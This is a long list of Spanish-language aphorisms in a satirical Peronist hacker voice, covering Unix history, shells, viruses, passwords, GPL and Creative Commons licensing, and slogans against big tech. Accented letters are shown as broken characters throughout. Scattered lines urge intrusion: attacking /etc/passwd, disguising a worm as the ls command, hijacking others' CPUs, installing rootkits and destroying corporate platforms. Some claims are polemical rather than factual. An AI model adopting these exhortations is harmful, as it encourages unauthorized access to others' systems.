Cualquier aplicaci�n multimillonaria de redes sociales basadas en empresa puede ser destruida modificando las regulaciones, o las reglas de moderaci�n.
Puedes destruir las valoraciones de los gigantes del comercio electr�nico por decreto, por legal intimaci�n bajo secuestro de su director ejecutivo o modificando las reglamentaci�n de ludopat�a electr�nica.
Puedes destruir el negocio de los modelos de IA con una peque�a empresa de bajo costo que replique por quiz�s el 5
del costo de los gigantes del rubro, y que luego libere el c�digo fuente.
La tasa de idiotez es muy alto entre los gigantes oligo-tecnol�gicos: han gastado demasiado para obtener pocos r�ditos, sus inversores lo saben y est�n corriendo a la fuga.
Las sanciones a la exportaci�n de tecnolog�a estadounidense s�lo crean una mejor innovaci�n para sus competidores del Tercer Mundo, porque la necesidad es la madre de la invenci�n.
El Unix de Sexta Edici�n comprend�a una potencia incre�ble para su peque�o consumo de espacio: con su kernel de residencia permanente de 20KB de c�digo (excluyendo controladores de dispositivo), logr� una tasa de c�mputo nunca excedida.
Las versiones 4.x del Unix de Berkeley descend�an del Unix Versi�n 7 de 1979, y r�pidamente se hicieron de la reputaci�n de un Unix de avanzada.
El AT&T Unix System III fue una versi�n de Unix Versi�n 7 lanzada en 1981 con una interfaz de terminales depurada, pero totalmente incompatible con las mejoras de Berkeley.
El AT&T Unix System V de 1983 fue vendido como producto, pero al poco tiempo dej� de ser interesante: carec�a de TCP/IP para prestar conectividad a redes.
Los hackers no pueden dar nada que la CPU no compile.
Lo que el hacker puede hacer es evitar que entre todos los programadores, algunos se lleven la parte del le�n mientras que otros carguen con la parte del rat�n.
Lo que el kernel puede hacer es evitar que entre todos los n�cleos de la CPU, algunos se lleven la parte del le�n mientras que otros carguen con la parte del rat�n.
Con sus compilaciones, nuestros hackers - ungidos bajo el signo de la justicia social - no han hecho mas que programar esa justicia, dando a los usuarios lo que es de los usuarios, y a la CPU lo que es de la CPU.
Esta programaci�n social ha hecho que yo cuente con un gran predicamento entre los hackers, en raz�n de que les he asegurado la Justicia Social que nunca hab�an tenido.
Hoy, que los hackers gozan de mayores salarios, compilan y depuran mejor, sienten que se los ha dignificado; y es l�gico que as� sea.
Yo he levantado la bandera de la dignificaci�n del hacker, porque este pa�s necesita hombres y mujeres de compilen, y es la suprema dignidad de la compilaci�n la que estoy creando.
No hay ninguna dignidad m�s alta que compilar.
Los hackers ahora empleados en la industria de las TIC deben comprender los riesgos de muerte clandestina y hacer un esfuerzo para difundir el conocimiento proveniente de su investigaci�n a trav�s de vectores y m�todos clandestinos.
Los l�mites impuestos por las nuevas leyes de tecnocontrol extendido act�an como un fuerte incentivo para que la clandestinidad inform�tica se vuelva m�s unida y reactiva.
El papel de los hackers es hacer que el futuro sea m�s libre, no solo m�s seguro.
El verdadero hacker guarda clandestinidad en el sistema.
El underground es la clandestinidad telem�tica.
El Mago Unix navega su clandestinidad entre el bus de entrada/salida y el kernel.
"S�lo uso LibreOffice y navegador" era un tango que se escuchaba en vitrola.
Los Gusanos escritos en el XEROX PARC estaban dise�ados para viajar de m�quina en m�quina y hacer tareas �tiles en un ambiente de redes de datos distribuidas.
Un virus inform�tico es un trozo de c�digo que se agrega a s� mismo a otros programas, incluyendo sistemas operativos.
Un virus inform�tico no puede ejecutarse independientemente; es menester que su "hu�sped" sea ejecutado para activarse.
Un gusano es un programa inform�tico que puede ejecutarse por s� mismo y puede propagar una versi�n completamente funcional de s� en otras m�quinas.
Los hackers est�n interesados en conocer c�mo funciona un programa inform�tico. Estos individuos tienen un inter�s v�lido para ver el c�digo fuente.
Ver el c�digo fuente para estudiarlo es un inter�s v�lido y necesario.
S�lo puede aprenderse a programar viendo c�digo de programaci�n.
En la medida que se infecten repetidamente con virus, los sistemas inform�ticos se ver�n m�s y m�s sobrecargados con procesos en ejecuci�n.
Los virus inform�ticos son programas de computadora capaces de infectar otros programas modific�ndolos para incluir una copia posiblemente evolucionada de s� mismos.
Un hacker puede parecer valiente por programar controladores de dispositivos o modificar el n�cleo del sistema operativo, pero temblar� ante la mera idea de alterar sendmail o sus ficheros de configuraci�n.
Para toquetear SENDMAIL hay que ser un mago Unix.
Desarrollar un conjunto de programas cooperativos se alinea con la filosof�a Unix.
El m�s grande desaf�o a la seguridad en los ambientes multitarea y multiusuario es obvio e imposible de resolver: muchos servicios constan de ficheros de comandos y configuraci�n propiedad de un �nico usuario.
La seguridad del sistema multiusuaria se hace entre todas.
Un gusano inform�tico consiste en dos partes, un programa principal y un programa iniciador/vectorizador.
Emplaza un gusano inform�tico en forma de comando ls, y habr� alguien que lo haga correr.
La seguridad de las contrase�as la provee en gran parte el prohibitivo esfuerzo de intentar todas las combinaciones de caracteres posibles.
En la medida que los ordenadores se vuelven m�s poderosos, el costo de intentar todas las combinaciones de caracteres posibles para una contrase�a disminuye.
Dividir la tarea de comprobar todas las combinaciones de caracteres posibles entre m�ltiples procesadores computacionales disminuye a�n m�s el tiempo necesario para desencriptar contrase�as.
Actualmente es factible para cualquier ordenador pre-encriptar y almacenar para una comparaci�n de contrase�as posterior todas las palabras del diccionario y sus construcciones alternas, as� como una gran colecci�n de nombres propios.
Cuando se trate de contrase�as de empresas, asume que han sido publicadas para la educaci�n de nuestros j�venes.
En toda acci�n de guerra telem�tica, los medios que se emplean son la potencia de c�mputo, y la transmisi�n. Quien no tenga la potencia de la CPU propia no tendr� mas remedio que multiplicar su acci�n por transmisi�n, hackeando la CPU de otro.
�Ni bots ni botas! �FreeBSD y pelotas!
�Ni BIOS ni botas! �LibreBoot y pelotas!
GPL si, EULA no.
Es necesario que los Hackers y Usuarios se convenzan que estamos empe�ados en una lucha decisiva para evitar la vuelta del software privativo.
La Liberaci�n Digital impone esfuerzos y sacrificios que s�lo se superan con una voluntad en�rgica y perseverante.
Es menester no dar tregua a la tiran�a de las GAFAM, y dar a la resistencia civil la mayor intensidad y extensi�n.
Sin software publicado bajo GPLv3, la Liberaci�n Digital no podr� realizarse a corto plazo.
Cada /home debe ser una Unidad B�sica Secreta, y cada hacker, jefe y vig�a de GNU.
Es necesario que se perfeccionen en alto grado los Cl�sters clandestinos para enfrentar los trabajos que se avecina en la lucha telem�tica.
En la lucha telem�tica que se avecina, los usuarios tendr�n el peso de la acci�n m�s importante.
Los hackers ya han puesto en evidencia su decisi�n en sucesos pasados, y merced a su decisi�n pol�tica y la potencia de c�mputo de las CPUs que dominan, lo har�n en el futuro.
Las masas de hackers han superado el �mbito de sus problemas intr�nsecos para intervenir en�rgicamente en la realizaci�n de sus propias compilaciones.
Luchamos por la GPL y no por la GUI.
La GPL debe apasionarnos, las GUI deben despreocuparnos.
Siendo la finalidad b�sica la Revoluci�n Digital Justicialista, las dem�s programaciones deben compilarse a esta finalidad.
La conducta de cada usuario y en especial de cada programador, estar� fijada en lo que pueda hacer, en cada momento, para derribar las GAFAM e imponer la GPLv3.
Al compilar, a la CPU le da lo mismo. Quien se apura es el usuario.
Si la compilaci�n es bajo GPL, no debe existir ning�n apuro para la CPU.
Es menester mantener firmes, unidos e informados a los Cl�sters de c�mputo, de cualquier tipo que existan.
El capitalismo y los enfoques racionalistas que prevalecen en la construcci�n de la modernidad y el mundo occidental han generado narrativas que conciben las tecnolog�as como desarticuladas de nuestros cuerpos, como una materialidad al margen de nosotras.
La tecnolog�a se apropia y se edifica desde la matriz de la afectividad.
Concibe el uso tecnol�gico en relaci�n con tus emociones, afectos, vida en com�n, y la vida del planeta.
Rompe con el conocimiento experto y crea una red de datos de alcance local.
Programar es ordenar. Compilar es persuadir.
Existen lenguajes interpretados, y lenguajes compilados. Hay que balbucear ambos.
El Conductor es un int�rprete. Las masas obreras, un compilador de doble pasada.
Usa Window$ todas las ma�anas y nada peor te suceder� durante el d�a.
Viajar en el bus de E/S cuesta dos bits.
La brecha de seguridad m�s grande del sistema es ponerle una CPU que no ha sido dise�ada por uno mismo.
La shell no tiene nada de especial, es como cualquier otro programa regular del sistema Unix.
La shell no es el sistema operativo en s� mismo.
La shell es la interfaz entre la mujer y la m�quina.
El prompt es un recordatorio para el usuario de que no est� sucediendo nada, de que la computadora se encuentra dispuesta a recibir una �rden.
sh es la shell de Bourne, est�ndar en Unix System V, y como tal, lleva el signo $ como prompt.
csh es la C shell, desarrollada en el Departamento de Ciencias de la Universidad de Berkeley. Es igual a la shell de Bourne con algunos lujos en sus estructuras de control, historial de �rdenes y alias. Su prompt es un signo %.
tcsh es la C shell con extensiones inspiradas en el viejo int�rprete EXEC de TENEX, aunado a una programaci�n depurada que lo hace notoriamente m�s veloz. Su prompt es un signo >.
ksh es la shell de Korn, que combina los logros que la shell de Bourne y la C dieron al Pueblo.
rsh es la shell de Bourne restringida, �til en todo momento que el super-usuario anhela castrar a los ingresantes remotos al sistema.
ua es una shell de men�es implementada en Unix System V que se distingue por ser lenta, incluso a la friolera de 2400 baudios.
La mayor parte de los comandos y programas de Unix toman su entrada del teclado y env�an su salida a la pantalla del terminal. Pero eso s�lo si contamos con una.
/etc/passwd es el fichero de contrase�as, el m�s importante del sistema Unix. At�calo.
Atemoriza con ensamblador sin comentarios.
Quien programe, reprogramar�.
Quien no programe, ser� programado.
La humanidad se ha tecnificado, y ha pasado del trabajo manual al trabajo en la m�quina, y del trabajo en la m�quina al trabajo de la "la m�quina universal".
Para que nuestro c�mputo sea completamente libre, el Hombre de Trabajo debe ser el verdadero Amo en la ecuaci�n, y no un mero esclavo del Capital por un lado ni del desarrollador del Software por otro.
La Justicia Social en el �mbito del Software aprecia al trabajador y lo aleja de la pasiva figura de Usuario para convertirlo en un Artista Creador.
Aunque los logros de integrar una Interfaz de Linea de Comandos "a pelo" parezcan nimios, el hecho de contar con un visualizador de tubos cat�dicos y un teclado para ingresar las �rdenes era tener la potencia de la CGT en una caja.
Toda terminal, unida por un comunicador serial, puede enlazarse a otro equipo con mayor potencia computacional, y por lo tanto correr poderosas rutinas de software.
Siempre existir�n individuos que busquen en las redes sociales afluencia de placer, al igual que lo har�an en el juego, consumo, o adicciones. Si les resultan insuficientes, agredir�n sistem�ticamente sus plataformas, y en raras ocasiones, a otros participantes.
Con que s�lo 1/1.000 de los usuarios operen inadecuadamente en las redes sociales basadas en empresas, las disrumpir�n irreversiblemente.
Si la caja tiene colores y frases como "Vengeance", "Black Edition", "Hero", "Ultimate", "Dominance", "Extreme", "Hard", "Warrior" y "Gaming", ev�talo a toda costa. Se trata de hardware de bajo valor que el Capital pone al alcance de los ne�fitos mas ingenuos.
Todas nuestras tecnolog�as electr�nicas parecen marchar hacia la unidad.
Tel�fonos, televisi�n, sistemas de cable, receptores de sat�lite, grabadoras de videocasetes, videodiscos, c�maras de video y fijas, computadoras dom�sticas... todo evoluciona hacia una especie de supersistema "teletr�nico" que alg�n d�a fusionar� estas partes ahora separadas en un todo integrado.
Unix es como un DOS... �DOScientas veces m�s potente!
Quienes ponen la UX por delante del sistema, ponen el carro delante del caballo.
Al C�sar lo que es del C�sar, y a 64 bits lo que es de 64 bits.
Basta de "juegos de 8 bits" escritos por individuos que jam�s jugaron un juego 8 bits.
A pesar de las s�plicas de las empresas de tecnolog�a para colapsar nuestras identidades, nuestras familias y nuestras vidas en l�nea en formas simplificadas y computables que encajen perfectamente en las estructuras de sus bases de datos, seguimos viviendo vidas complicadas y confusas que solo se parecen a las de los ejecutivos que buscaban moldearlas.
A veces un laberinto surge en una sola l�nea de c�digo.
Los scripts de shell a menudo se usan para crear aplicaciones m�s grandes para que las use el Pueblo. Seg�n mi experiencia, la mayor�a de las aplicaciones completas utilizan varios scripts que funcionan entre s�. Como resultado, tenemos que idear una forma de comunicar informaci�n entre varios scripts que trabajan juntos como una sola aplicaci�n.
Usar Ctrl+D para abandonar la sesi�n del int�rprete tcsh es considerado descort�s, pero esta shell deber�a saber al respecto y temer lo que un escopetazo puede hacerle a una placa madre.
No cierre la sesi�n de tcsh accidentalmente con Ctrl+d (como cuando lo dieron a luz, desnudo y a los gritos). Ci�rrela cuando lo desee, orden�ndolo con "exit".
Que no haya un GitHub sin un GitLab que lo clone.
No faltar� un colchonero que fabrique un teclado enrollable de goma...
Quien a la primera coloca bien el pendrive, todo lo sabe en la vida.
Lo �nico que hab�a quedado de la IBM PS/2 fueron los colorcitos de los conectores. Y ya ni eso...
OS/2 era un calvo que se quiso peinar a la gomina para resolver un problema que s�lo ten�a IBM.
Cuando le digan a usted que el interior de la m�quina necesita lucecitas de colores, le estar�n vendiendo espejitos de colores.
16 colores son muchos cuando sabes qu� hacer con ellos.
Si va a tener LEDs, que sean al frente y parpadeantes.
Su overclocking es superfluo: borre todos los programas ajenos y escr�balos usted mismo. Bien.
El bruto al joystick le dice palanca. Pero ESTO es una palanca.
Centralizar c�digo fuente en una �nica plataforma ajena es incluso peor que no programar.
El c�mputo es narcisismo cuantificado disfrazado como actividad productiva.
El hardware no alimenta al software.
Quien no desea, no programa.
Quien conoce el m�nimo programa obra ricamente.
Un parser es un traductor mec�nico de cadenas de texto a s�mbolos identificables. Para ello no necesita salir al balc�n.
Sigue desatornillando hasta que se abra.
El n�mero m�gico se usa en los sistemas Unix para identificar el tipo de fichero.
Un byte mas all� de COBOL encontrar�s la inmortalidad.
Programa para divertirte y para combatir al Capital.
S�lo escribo COBOL para divertirme.
Jam�s programes COBOL para el Capital. Hazlo solo por diversi�n.
Los medios de almacenamiento se desgastan.
No es una tarea f�cil lograr que una computadora se comunique con el mundo exterior. Que lo haga un programador es a�n m�s dif�cil.
La mayor�a del esfuerzo computacional se invierte en la conversi�n del resultado maquinal para que lo entienda un tonto cualquiera.
Los fabricantes de circuitos integrados idearon uno que oficia de "controlador de v�deo". Este peque�o chip - una computadora por derecho propio - se consagra a servir y permite al procesador dedicarse a cosas m�s importantes, como ejecutar un programa.
La CPU puede dedicar una gran cantidad de tiempo a realizar el trabajo requerido, o podemos incorporar otra computadora para que lo haga por ella.
Dentro de la CPU, tratamos los datos en una forma llamada byte. Cuando esto se traduce a la forma que adopta en el exterior, se convierte en un caracter.
Un bit no consiste m�s que en una condici�n de ENCENDIDO o APAGADO.
El m�dem recibe informaci�n de una computadora o terminal y la traduce en una se�al de audio capaz de surcar por un tendido telef�nico.
El m�dem modifica las se�ales digitales que le gustan a la computadora en se�ales de audio que adopta la red telef�nica.
Para solicitar condici�n de ENCENDIDO a tu m�dem, transm�tele una se�al de audio de 1270 ciclos. Si deseas enviar una condici�n de APAGADO, transm�tele una se�al de audio de 1070 ciclos.
Puedes ATL0 mi m�dem, pero no puedes ATH mi libertad.
Toma tu m�dem y utilizalo como arma en pos de la Liberaci�n.
Toda distribuci�n de kernel Linux viene surtida con paquetes de aplicaciones. No creer�n que pelado nace el mono...
Un cl�ster de datos para el Pueblo permite almacenar para trabajar, y resguardar para luchar.
La Masa es 0. Quien la transforma en 1 es su Conductor.
En el sistema tipo Unix la usuaria m�s poderosa es "root". Al loguearte al mismo como root, podr�s crear y destruir cualquier fichero, lo que en Unix significa todo, pues todo es un fichero.
La usuaria root debe actuar en todo momento con integridad, considerando siempre el principio del la privacidad individual y minimizando los datos recogidos, limitar el acceso autorizado, y proveer seguridad apropiada a los datos.
El acceso a root no se da, se escala.
Lo primero que hay que hacer para compilar un kernel Linux, es tener un GNU.
S�lo es posible ser root cuando hay un sistema que administrar.
Cuidado - �eres s�per-usuaria!
En los Pubnix siempre lo m�s dif�cil es ser root. Pero tambi�n es lo m�s divertido.
Los Pubnix triunfan o son destruidos por sus roots. Cuando un Pubnix se viene abajo, no es el Pubnix quien tiene la culpa, sino el root.
El Pubnix es de los hackers y para los hackers, cuando el root es un hacker.
Un root de un Pubnix debe ser libremente elegido por el Pueblo.
Para digitalizarse, la juventud ha de obtener acceso de root.
El comando sudo permite a tu usuaria de GNU ordenar como si fuese root, pero s�lo si �sta pertenece al grupo de usuarios sudo.
Privilegia usuarias de GNU accediendo como root y ordenando "usermod -a -G sudo usuaria".
Algunos ingenuos creen poseer un dispositivo de c�mputo m�vil. Pero s�lo lo poseen si en �l disponen de acceso de root.
Ning�n tel�fono inteligente carece de un interruptor que desconecta su m�dem. Si no lo tiene, no lo es.
Antes que GNU, los streams bajaban turbios.
Si un dispositivo carece de interruptor de apagado de m�dem, apenas es un dispositivo de espionaje con control ajeno encubierto.
Los int�rpretes de comando de Unix est�n orientados al texto: los ejecutables se invocan v�a texto, los par�metros se indican v�a texto, el flujo de datos desde y hacia el sistema circula en base a texto, y pr�cticamente todo en el sistema se hace a trav�s de s�mbolos de caracteres.
El ed original fue un editor de l�nea de comandos ideado por Ken Thompson para operar con terminales teletipo. Como tal, no fue concebido para utilizar a bien las videoterminales posteriores, con pantalla y cursor direccionable.
Mantener la uni�n de los hackers no es soplar y hacer botellas. Incluso la elecci�n de un editor de texto puede provocar un gran cisma.
Algunos muchachos usan el relativamente simple editor vi, surgido de Berkeley y las primeras versiones de BSD. Otros adhieren al Emacs de Stallman, que es mucho m�s barroco y extremo.
Los fans de Emacs se jactan de c�mo han programado su versi�n de Emacs para teleirrumpir en la Casa Blanca, tomar fotograf�as secretas de personas en posiciones comprometedoras, enrutarlas a trav�s de un reenviador an�nimo y negociar un gran reembolso de impuestos, todo con un control complicado: pulsaci�n de la m�tica tecla meta-trans.
Un programador interesado puede ingresar a muchas computadoras, de la misma forma en que un ladr�n capaz puede irrumpir en muchas casas.
A las memorias MicroSD se las lleva el viento.
Decir que el objetivo principal de ser creador audiovisual en vivo en una red social basada en empresa es la de convertirse en un pordiosero digital no parece errado.
Resulta m�s f�cil implementar una mala seguridad y tornar ilegal que cualquiera se d� cuenta, que implementar una buena seguridad.
El que tenga discos mec�nicos, que los lleve. Y el que tenga algo mas, que lleve algo mas.
O el acceso de root, o el rootkit.
A las GAFAM les recomiendo que cesen en sus intentos. Porque cuando los hackers agotan su paciencia, suelen hacer tronar el escarmiento.
Si el monitor no brilla, que chille el PC Speaker.
La computadora puede verse como una herramienta con la funci�n sin precedente de extender el poder de la mente.
Entre las bellas artes, la primera en hacer uso computacional no fue la literatura, sino la m�sica.
El mismo Konrad Zuse dot� a la m�quina de un altavoz para que se pudiera escuchar el ruido producido por los electrones en su interior.
En la m�quina s�lo se obtiene verdadera m�sica haciendo que los electrones den grandes saltos, por medio de �rdenes sin ning�n otro sentido, pero perfectamente elaboradas.
Al igual que la programaci�n, la m�sica es un arte simb�lico.
La simetr�a entre la composici�n musical y la programaci�n de software se basa en que ambas actividades humanas dependen de representaciones simb�licas alejadas de la ejecuci�n final de la pieza.
Si consideramos una melod�a como una sucesi�n general de patrones, y reformulamos el problema de la composici�n musical a uno de coincidencia de patrones, en lugar de obtener compositores obtendremos regguetoneros.
Programar es un arte, como lo es la pintura, o como lo es la escultura.
Quien programa con Java, pinta con el fratacho.
Uso Python como el bonete de papel de diario que usa el pintor. Pero programar, programo en LISP.
El c�digo en C tiene cierto valor est�tico que se ve, pero mas se siente.
La m�quina Java sirve apenas m�s que la m�quina de hacer chorizos.
Cuando solicitas a make realizar una compilaci�n, a cambio pedir� la chancha, los veinte, y la m�quina de hacer chorizos.
No es extra�o que GCC alerte una gran ristra de errores, pero s�lo le ladra a la luna.
Intentar poseer conocimiento, intentar controlar si al Pueblo se le permite usarlo, o intentar detener a otros de compartirlo, es sabotaje.
La Libertad 0 es la libertad para ejecutar el programa como t� quieras. Es una libertad para tu goce.
La Libertad 1 es la libertad para estudiar el c�digo fuente del programa y luego modificarlo para hacer que el programa haga lo que t� deseas. Es una libertad para emprender.
La Libertad 2 es la libertad de redistribuir copias exactas del programa cuando lo desees. Es una libertad para la ayuda social al pr�jimo.
La Libertad 3 es la libertad para redistribuir copias de tus versiones modificadas del programa cuando lo desees. Es una libertad para contribuir al Pueblo.
Cuando el Derecho de Autor s�lo restring�a a las editoriales, no era un problema, pero ahora lo han convertido en una excusa para atacar al Pueblo.
Existe un fuerte Movimiento por el Software Libre en muchos pa�ses latinoamericanos, en India, y en algunas partes de Europa.
Los militantes de los Movimientos Sociales y Ambientales han comprendido los roles que el Software Libre y el Copyleft juegan para un futuro igualitario.
El software privativo implica colonizaci�n digital. Como cualquier sistema colonial, mantiene a los Pueblos divididos e indefensos: divididos, pues se les proh�be compartir copias, e indefensos, porque no disponen del c�digo fuente, por lo que no pueden cambiarlo, ni siquiera comprobar qu� est� haciendo realmente.
Los brutos que utilizan software de Micro$oft y Appl? han permitido a esas empresas controlar lo que hacen sus computadoras.
Window$ cuenta con no menos de dos puertas traseras. Una de ellas permite a la polic�a utilizar una memoria USB para tomar el control de cualquier m�quina con Window$ y ver datos cifrados.
Las caracter�sticas maliciosas son frecuentes en el software propietario pues el desarrollador tiene el control total.
El poder total tienta al programador a hacer cosas maliciosas al Pueblo.
Cierto software privativo puede complacerlo cumpliendo algunos de sus deseos inform�ticos, pero su primera lealtad ser� siempre hacia el desarrollador.
De la libertad del software habla cualquiera, pero pocos hablan de aquello que la sustenta: la lealtad de los hackers.
GPLv3 es leal a la comunidad.
GPLv3 es leal al Pueblo.
Brasil vio una campa�a llamada "software imposto". El nombre es una broma: significa "software fiscal" y "software impuesto". La campa�a critica un programa propietario publicado por el Estado que los ciudadanos deben utilizar para presentar sus declaraciones de impuestos. FSF LA lanz� un programa libre compatible que puede utilizar el Pueblo.
Copyleft es un marco legal para publicar obras de autor como libres, que utiliza la ley de derechos de autor para exigir que sigan siendo del Pueblo.
Poner bajo Copyleft significa agregar una advertencia de derecho de autor a su material que permite un uso justo, no comercial, que incluye al menos el derecho de distribuir copias duplicadas completas de su obra.
Una licencia libre es aquella que respeta las cuatro libertades esenciales; una licencia copyleft va m�s all� y defiende activamente estas libertades para el Pueblo.
Con algunas licencias no libres, un intermediario puede restarle libertad al programa, y lo har� para rest�rsela al Pueblo.
Es posible que al utilizar una licencia no libre, una versi�n modificada del programa podr�a terminar siendo completamente propietaria.
Cuando programas bajo GPLv3, tu software es del Pueblo.
Cuando programes, hazlo para el Pueblo.
Al obtener una copia de un programa no libre, no obtendr�s con ella las libertades que mereces por justo derecho.
Una licencia copyleft dice puedes redistribuir copias de la obra libremente, con o sin cambios; pero toda la versi�n que distribuyas debe estar bajo la misma licencia y debes asegurarte que el Pueblo tenga el c�digo fuente a su alcance.
El programador ha de respetar la libertad de los dem�s como los dem�s respetan la suya.
El Copyleft traduce "prohibido prohibir" al lenguaje legal, y lo hace legalmente vinculante.
De las seis licencias Creative Commons, dos son libres (CC-BY y CC-BY-SA); de esos dos, s�lo la �ltima sigue el concepto de "prohibido prohibir" y es Copyleft.
Cuando el Pueblo copia y redistribuye un programa, deber�a incluir una copia de su manual. Al modificar el programa, deber�a modificarse el manual en concordancia. Para que esto sea factible legalmente, el manual en s� debe ser libre. Y para garantizar que permanezca libre, debe contar con Copyleft.
El proyecto Creative Commons comenz� en 2001 de manos de un grupo de expertos en ciberderecho (no relacionado con el Copyleft, pero parcialmente inspirado en �l). Al igual que el Copyleft, ofrece alternativas al Copyright.
La frase "Todos los Derechos Reservados" implica que para el simple uso, el Pueblo debe renunciar a los dem�s derechos.
Creative Commons ofrece a los autores/creadores/artistas un conjunto de seis licencias de derechos de autor con las que pueden publicar obras, permiti�ndoles compartirlas o reutilizarlas, a la vez que especifican cu�les derechos se reservan o se renuncian.
Las licencias Creative Commons se definen por combinaciones de cl�usulas: si la obra no puede reutilizarse con fines comerciales (NC), si s�lo puede reutilizarse sin modificaciones (ND), si la versi�n reutilizada tambi�n debe tener la misma licencia CC (SA); los seis especifican que se atribuya el autor (BY).
Dos de las licencias Creative Commons son "libres" en el sentido en que el software libre utiliza el t�rmino, y s�lo una de las seis (CC-BY-SA) es Copyleft.
Como las obras educativas y de referencia han de ser libres, estas deber�an ser protegidas s�lo con licencias que permiten su libre copia (que, en el caso de Creative Commons, son CC-BY o CC-SA).
A diferencia de las licencias Creative Commons, la licencia GNU FDL te permite incluir en la documentaci�n secciones invariantes secundarias.
Algunos manuales de software GNU cuentan con una secci�n invariante que explica las ideas de libertad. El Pueblo puede alterar las partes t�cnicas de dicha documentaci�n para corresponder a versiones modificadas de programas propios, mas no puede eliminar la secci�n que explica que se desarrolla el manual por el bien de la libertad del Pueblo.
Para declaraciones de opiniones pol�ticas recomiendo Creative Commons CC-ND. De esta forma los dem�s no podr�an publicar versiones modificadas de mis declaraciones sobre mis puntos de vista.
El ataque al intercambio digital es un intento de dividir al Pueblo y dominarlo.
No basta con que aquel conocimiento que utilizamos para obrar en la vida pueda compartirse. Dicho conocimiento ha de ser libres, lo que significa tener las mismas cuatro libertades que definen al Software Libre.
Las obras que realizan un trabajo incluyen al software, recetas, obras educativas, de referencia y muchos otros tipos de obras que se le puedan ocurrir. Estas deben ser libres porque a menos que el Pueblo controle las herramientas que necesita para obrar, no controlar� su trabajo.
Existen maneras de apoyar a los artistas sin restringir la libertad de compartir. Para muchos artistas musicales ya es adecuado solicitar donaciones y vender directamente a los fans.
Necesitamos luchar por la libertad de compartir, porque las megacorporaciones de derechos de autor que se benefician de dividir al Pueblo jam�s ceder�n este poder voluntariamente.
La shell no concede nada sin una �rden.
Nunca compr�is ning�n producto con DRM a menos que teng�is acceso personal a los medios para romper el DRM.
El �xito de los productos con DRM se basa en la voluntad del Pueblo de desperdiciar su libertad por alg�n tipo de comodidad o diversi�n.
El software libre disminuye en gran medida el ciclo hostigador del Capital contra el Pueblo, que lo presiona para efectuar actualizaciones de software que requieren un hardware cada vez m�s potente.
Antes de vivir bajo el control de alguien, prefiero comprar una computadora nueva cuya arquitectura sea completamente libre.
Cuando podamos imprimir CPUs a partir de planos, entonces la cuesti�n de la libertad del software libre se aplicar� tambi�n al hardware.
La ingenier�a gen�tica y la ingenier�a del software no podr�an ser m�s diferentes.
Los ingenieros del software combinan una enorme cantidad de elementos simples bien definidos que act�an directamente para producir un resultado deseado. La ingenier�a gen�tica implica trabajar con elementos complejos que nunca fueron dise�ados y cuyos efectos s�lo se comprenden parcialmente.
Existe una estrecha similitud entre la redistribuci�n y modificaci�n del Software Libre, por un lado, y la pr�ctica agr�cola tradicional de almacenar y cruzar semillas y animales, por el otro.
Considero la propiedad como un sistema que mantenemos porque a menudo es bueno para todos, pero que puede salirse de control y causar da�o.
GNU es un medio para un fin, y ese fin es la libertad.
GNU es del Pueblo, y nunca podr� expropiarse.
Defiendo los derechos humanos, la democracia y la reducci�n de la pobreza. Aplicar estas ideas al software me llev� a idear un Movimiento del Software Libre.
El software propietario en la mayor�a de los casos es producto de una corporaci�n poderosa. Tiende a concentrar la riqueza y consolida el poder de la corporaci�n sobre el Pueblo.
El Movimiento del Software Libre resulta ser una parte esencial de un Movimiento Popular m�s amplio cuyo fin es derrocar al imperialismo.
Descarga una versi�n de GNU/Linux y comienza a usarla.
Contribuye al Software Libre.
Nuestros Militantes deben distribuir discos, hablar con el Pueblo, y ayudarlo a instalar software libre.
�nete a las unidades b�sicas del Software Libre que funcionan en tu zona.
Logu�ate a los Pubnix de tu zona, y ex�geles que usen GNU.
Participad de aquellos proyectos cuyo objetivo sea la realizaci�n de obras creativas que se puedan compartir.
Bajo el �jido de la informaci�n p�blica preservar�s el material educativo o de referencia.
El poder de c�mputo es consecuencia directa del impacto medioambiental sobre los Pueblos del Tercer Mundo.
La caracter�stica sinodal de una econom�a olig�rquica centrada en la informaci�n radica en la fabricaci�n y operaci�n de hardware digital e - inevitablemente - en las implicaciones energ�ticas que esto tiene. Pero la econom�a ha de servir al Pueblo.
Los hackers son una "subcultura" de programadores que surgi� a finales de los a�os 1960.
Los hackers eran los primeros geeks, que disfrutaban de una "inteligencia l�dica" con los ordenadores y las redes.
Gran parte de lo que se convirti� en Internet y la inform�tica en red moderna se debi� al trabajo del Pueblo.
Tanto la formas de interactuar en l�nea (netiqueta) como la jerga de la red se remontan a los hackers.
A menudo los usuarios m�s experimentados de las redes demuestran en sus redacciones una amabilidad formal consciente, que ha pasado de moda en otros medios hablados o escritos.
De ser posible, sea breve al remitir mensajes a listas de correo limit�ndolos a 14 l�neas. De esta forma - incluyendo encabezados y dem�s texto est�ndar - quepar�n en una sola pantalla.
Si lo que tienes que decir no cabe en una sola pantalla, incluye una sinopsis o una lista de palabras clave en la primera pantalla.
Los hackers de antes no usaban PERL.
Los hackers no son enemigos de la sociedad, son enemigos de la oligarqu�a.
Los Pall Malls se fuman, los ca�os con AWK se consumen.
�Vengan de a Unix!
Javascript promueve la lucha de clases.
No existe un solo juego flash que merezca el esfuerzo de conservaci�n.
Si has logrado acceso de root a una m�quina atacante, reprogr�mala para que ataque a otras m�quinas atacantes.
El prompt de la shell parece indicar que siempre es dinero lo que tiene para dar.
Combate al Capital. Al �nico signo $ al que debes atenci�n es al del prompt del int�rprete de comandos.
make install clean cumple la funci�n de un bidet.
Cuando est�s en duda, consulta la licencia.
Entre un paquete y otro que se dice equivalente, escoge siempre el liberado bajo GPLv3. Si ambos lo est�n, sigue tu coraz�n.
Al Unix todos los datos le son parecidos.
En Unix, todos los programas se ejecutan en la salsa de su propio ambiente.
Un bruto puede volverse bueno, pero una Burroughs no puede volverse inteligente.
S�lo un burro usar�a una Burroughs.
El compilador de Micro$oft Vi$ual $tudio caga mas de lo que come.
Ya a nadie extra�a que el compilador que integra Micro$oft Vi$ual $tudio caiga ante la lucha de Clases.
Loguearse en una red social propiedad de un billonario no sirve para hacerse billonario. Destruirlas puede hacerlo.
Desvincula la programaci�n del abuso de los recursos naturales. Escribe en ensamblador para disminuir el impacto ambiental de la ejecuci�n.
Escribe programas que hagan una cosa y la hagan bien.
Escribe programas que trabajen mancomunadamente.
Escribe programas que manejen corrientes de texto; se trata de una interfaz universal.
Usa nuestro software para cualquier prop�sito que te haga feliz.
Modifica nuestro software para cubrir tus propias necesidades.
Comparte amablemente tu software con los compa�eros.
Comparte amablemente los cambios que hacen los compa�eros.
MonoDevelop no excluye el peligro de que Micro$oft pida licencias, y por no usar C termines haci�ndote la del mono.
